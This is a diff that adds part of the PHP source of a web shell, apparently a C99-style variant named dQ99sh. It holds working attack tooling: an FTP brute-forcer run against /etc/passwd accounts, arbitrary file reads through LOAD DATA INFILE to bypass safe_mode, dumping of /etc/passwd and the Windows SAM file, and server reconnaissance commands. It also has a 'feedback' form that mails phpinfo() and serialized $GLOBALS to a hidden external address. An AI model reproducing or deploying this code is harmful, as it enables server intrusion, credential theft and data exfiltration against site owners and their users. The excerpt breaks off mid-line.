+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act)) {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb") {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus") {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars") {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes") {
+     if (!empty($kill)) {
+       $query = "KILL ".$kill.";";
+       $result = mysql_query($query, $sql_sock);
+       echo "<b>Process #".$kill." was killed.</b>";
+     }
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb);
+    }
+   }
+  }
+}
+echo "</td></tr></table>\n";
+if ($sql_sock) {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
+}
+echo "</table>\n";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "<center><table><tr><td class=barheader colspan=2>";
+echo ".: Ftp Quick Brute :.</td></tr>";
+echo "<tr><td>";
+if ($win) { echo "Can't run on Windows!"; }
+else {
+  function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
+    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+    else {$TRUE = TRUE;}
+    if ($TRUE) {
+      $sock = @ftp_connect($host,$port,$timeout);
+      if (@ftp_login($sock,$login,$pass)) {
+        echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+        ob_flush();
+        return TRUE;
+      }
+    }
+  }
+  if (!empty($submit)) {
+    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+    $fp = fopen("/etc/passwd","r");
+    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+    else {
+      if ($fqb_logging) {
+        if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+        else {$fqb_logfp = FALSE;}
+        $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+        if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      }
+      ob_flush();
+      $i = $success = 0;
+      $ftpquick_st = getmicrotime();
+      while(!feof($fp)) {
+        $str = explode(":",fgets($fp,2048));
+        if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
+          echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+          $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+          if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+          $success++;
+          ob_flush();
+        }
+        if ($i > $fqb_lenght) {break;}
+        $i++;
+      }
+      if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+      $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+      echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+      $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
+      fclose($fqb_logfp);
+    }
+  }
+  else {
+    $logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
+         "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
+         "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
+         "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
+         "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
+  }
+  echo "</td></tr></table></center>";
+}
+}
+if ($act == "d") {
+  if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
+  else {
+    echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+    if (!$win) {
+      echo "<tr><td><b>Owner/Group</b></td><td> ";
+      $ow = posix_getpwuid(fileowner($d));
+      $gr = posix_getgrgid(filegroup($d));
+      $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+    }
+    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
+  }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();}
+if ($act == "security") {
+  echo "<div class=barheader>.: Server Security Information :.</div>\n".
+       "<table>\n".
+       "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>\n";
+  echo "<td>Password File</td><td>";
+  if (!$win) {
+    if ($nixpasswd) {
+      if ($nixpasswd == 1) {$nixpasswd = 0;}
+      echo "*nix /etc/passwd:<br>";
+      if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+      if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+      echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+      $i = $nixpwd_s;
+      while ($i < $nixpwd_e) {
+        $uid = posix_getpwuid($i);
+        if ($uid) {
+          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+          echo join(":",$uid)."<br>";
+        }
+        $i++;
+      }
+    }
+    else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>Download /etc/passwd</b></a>";}
+  }
+  else {
+    $v = $_SERVER["WINDIR"]."\repair\sam";
+    if (!file_get_contents($v)) { echo "<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>"; }
+  }
+  echo "</td></tr>\n";
+  echo "<tr><td>Config Files</td><td>\n";
+  if (!$win) {
+    $v = array(
+        array("User Domains","/etc/userdomains"),
+        array("Cpanel Config","/var/cpanel/accounting.log"),
+        array("Apache Config","/usr/local/apache/conf/httpd.conf"),
+        array("Apache Config","/etc/httpd.conf"),
+        array("Syslog Config","/etc/syslog.conf"),
+        array("Message of The Day","/etc/motd"),
+        array("Hosts","/etc/hosts")
+    );
+    $sep = "/";
+  }
+  else {
+    $windir = $_SERVER["WINDIR"];
+    $etcdir = $windir . "\system32\drivers\etc\\";
+    $v = array(
+        array("Hosts",$etcdir."hosts"),
+        array("Local Network Map",$etcdir."networks"),
+        array("LM Hosts",$etcdir."lmhosts.sam"),
+    );
+    $sep = "\\";
+  }
+  foreach ($v as $sec_arr) {
+    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
+    $sec_d = rtrim($sec_arr[1],$sec_f);
+    $sec_full = $sec_d.$sec_f;
+    $sec_d = rtrim($sec_d,$sep);
+    if (file_get_contents($sec_full)) {
+      echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ] \n";
+    }
+  }
+  echo "</td></tr>";
+
+  function displaysecinfo($name,$value) {
+    if (!empty($value)) {
+      echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>\n";
+    }
+  }
+  if (!$win) {
+    displaysecinfo("OS Version",dQ99exec("cat /proc/version"));
+    displaysecinfo("Kernel Version",dQ99exec("sysctl -a | grep version"));
+    displaysecinfo("Distrib Name",dQ99exec("cat /etc/issue.net"));
+    displaysecinfo("Distrib Name (2)",dQ99exec("cat /etc/*-realise"));
+    displaysecinfo("CPU Info",dQ99exec("cat /proc/cpuinfo"));
+    displaysecinfo("RAM",dQ99exec("free -m"));
+    displaysecinfo("HDD Space",dQ99exec("df -h"));
+    displaysecinfo("List of Attributes",dQ99exec("lsattr -a"));
+    displaysecinfo("Mount Options",dQ99exec("cat /etc/fstab"));
+    displaysecinfo("lynx installed?",dQ99exec("which lynx"));
+    displaysecinfo("links installed?",dQ99exec("which links"));
+    displaysecinfo("GET installed?",dQ99exec("which GET"));
+    displaysecinfo("Where is Apache?",dQ99exec("whereis apache"));
+    displaysecinfo("Where is perl?",dQ99exec("whereis perl"));
+    displaysecinfo("Locate proftpd.conf",dQ99exec("locate proftpd.conf"));
+    displaysecinfo("Locate httpd.conf",dQ99exec("locate httpd.conf"));
+    displaysecinfo("Locate my.conf",dQ99exec("locate my.conf"));
+    displaysecinfo("Locate psybnc.conf",dQ99exec("locate psybnc.conf"));
+  }
+  else {
+    displaysecinfo("OS Version",dQ99exec("ver"));
+    displaysecinfo("Account Settings",dQ99exec("net accounts"));
+    displaysecinfo("User Accounts",dQ99exec("net user"));
+  }
+  echo "</table>\n";
+}
+if ($act == "mkfile") {
+  if ($mkfile != $d) {
+    if ($overwrite == 0) {
+      if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
+    }
+    else {
+      if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
+      else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
+    }
+  }
+  else { echo "<div class=dQerrmsg>Enter filename!</div>\r\n"; }
+}
+if ($act == "encoder") {
+echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
+     "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
+     "<input type=hidden name=act value=encoder>".
+     "<center><table class=contents>".
+     "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
+     "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
+     "<input type=submit value=\"calculate\"></td></tr>".
+     "<tr><td rowspan=4>Hashes:</td>";
+foreach(array("md5","crypt","sha1","crc32") as $v) {
+  echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
+}
+echo "</tr>".
+     "<tr><td rowspan=2>Url:</td>".
+     "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
+     "<tr><td rowspan=2>Base64:</td>".
+     "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>base64_decode:</td><td>";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
+else {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
+  else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
+}
+echo "</td></tr>".
+     "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++) {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly></td></tr></table></center></form>";
+}
+if ($act == "fsbuff") {
+  $arr_copy = $sess_data["copy"];
+  $arr_cut = $sess_data["cut"];
+  $arr = array_merge($arr_copy,$arr_cut);
+  if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
+  else {
+    $dQ_infohead = "File-System Buffer";
+    $ls_arr = $arr;
+    $disp_fullpath = TRUE;
+    $act = "ls";
+  }
+}
+if ($act == "selfremove") {
+  if (($submit == $rndcode) and ($submit != "")) {
+    if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name."!"; dQ99shexit(); }
+    else { echo "<center><b>Can't delete ".__FILE__."!</b></center>"; }
+  }
+  else {
+    if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
+    $rnd = rand(0,9).rand(0,9).rand(0,9);
+    echo "<form action=\"".$surl."\">\n".
+         "<input type=hidden name=act value=selfremove>".
+         "<input type=hidden name=rndcode value=\"".$rnd."\">".
+         "<b>Kill-shell: ".__FILE__." <br>".
+         "<b>Are you sure? For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=text name=submit>&nbsp;<input type=submit value=\"YES\">\n".
+         "</form>\n";
+  }
+}
+if ($act == "update") {
+  $ret = dQ99sh_getupdate(!!$confirmupdate);
+  echo "<b>".$ret."</b>";
+  if (stristr($ret,"new version")) {
+    echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
+  }
+}
+if ($act == "feedback") {
+  $suppmail = base64_decode("ZGhpZXF3ZWJtYXJrZXJAeWFob28uY29t");
+  if (!empty($submit)){
+    $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+    $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+    if (!empty($fdbk_ref)) {
+      $tmp = @ob_get_contents();
+      ob_clean();
+      phpinfo();
+      $phpinfo = base64_encode(ob_get_contents());
+      ob_clean();
+      echo $tmp;
+      $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+    }
+    mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
+    echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=feedback>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
+         "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
+         "*Language: English, Indonesian.</td></tr>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "dQmailer") {
+  if (!empty($submit)){
+    $headers = 'To: '.$dest_email."\r\n";
+    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
+    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
+      echo "<center><b>Email sent!</b></center>";
+    }
+    else { echo "<center><b>Can't send email!</b></center>"; }
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=dQmailer>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: $sh_name Mailer :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
+         "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
+         "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>\n";
+  }
+}
+if ($act == "search") {
+  echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
+  if (empty($search_in)) {$search_in = $d;}
+  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+  if (!empty($submit)) {
+    $found = array();
+    $found_d = 0;
+    $found_f = 0;
+    $search_i_f = 0;
+    $search_i_d = 0;
+    $a = array(
+        "name"=>$search_name,
+        "name_regexp"=>$search_name_regexp,
+        "text"=>$search_text,
+        "text_regexp"=>$search_text_regxp,
+        "text_wwo"=>$search_text_wwo,
+        "text_cs"=>$search_text_cs,
+        "text_not"=>$search_text_not
+    );
+    $searchtime = getmicrotime();
+    $in = array_unique(explode(";",$search_in));
+    foreach($in as $v) {dQ99fsearch($v);}
+    $searchtime = round(getmicrotime()-$searchtime,4);
+    if (count($found) == 0) {echo "No files found!";}
+    else {
+      $ls_arr = $found;
+      $disp_fullpath = TRUE;
+      $act = "ls";
+    }
+  }
+  echo "<table class=contents>".
+       "<tr><td><form method=POST>".
+       "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
+       "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
+       "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
+       "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
+       "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
+       "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
+       "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
+       "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
+       "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
+       "</table>\n";
+  if ($act == "ls") {
+    $dspact = $act;
+    echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
+         "<hr size=\"1\" noshade>";
+  }
+}
+if ($act == "chmod") {
+  $mode = fileperms($d.$f);
+  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+  else {
+    $form = TRUE;
+    if ($chmod_submit) {
+      $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+      if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
+      else {$err = "Can't chmod to ".$octet.".";}
+    }
+    if ($form) {
+      $perms = parse_perms($mode);
+      echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] 